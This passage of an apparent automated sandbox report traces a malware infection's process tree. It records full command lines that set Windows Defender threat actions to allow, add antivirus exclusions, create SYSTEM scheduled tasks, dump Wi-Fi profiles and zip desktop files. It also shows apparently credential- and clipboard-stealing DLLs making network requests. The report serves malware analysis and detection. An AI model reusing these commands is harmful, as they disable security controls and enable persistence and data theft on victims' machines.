C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 05:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exe\" Wt /ysXdidPVuH 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe"C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exeC:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e5ae1d0,0x6e5ae1dc,0x6e5ae1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2MYMzGM0Ir1ZgoCjigWHeOoy.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2MYMzGM0Ir1ZgoCjigWHeOoy.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe"C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5256 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428054213" --session-guid=8bb6ec06-836c-494f-9fdb-cd7782db5ad4 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=34050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exeC:\Users\Admin\Pictures\2MYMzGM0Ir1ZgoCjigWHeOoy.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d3be1d0,0x6d3be1dc,0x6d3be1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404280542131\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x9d6038,0x9d6044,0x9d60506⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\leykNOBNSzbftkeOiFe2gzF6.exe"C:\Users\Admin\Pictures\leykNOBNSzbftkeOiFe2gzF6.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe5⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"6⤵
-
C:\Users\Admin\Pictures\pLUaCKBxfWyIAv3qV3OFZGpE.exe"C:\Users\Admin\Pictures\pLUaCKBxfWyIAv3qV3OFZGpE.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 05:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Install.exe\" Wt /nOMdidyFFk 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3564 -ip 35641⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exe Wt /ysXdidPVuH 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
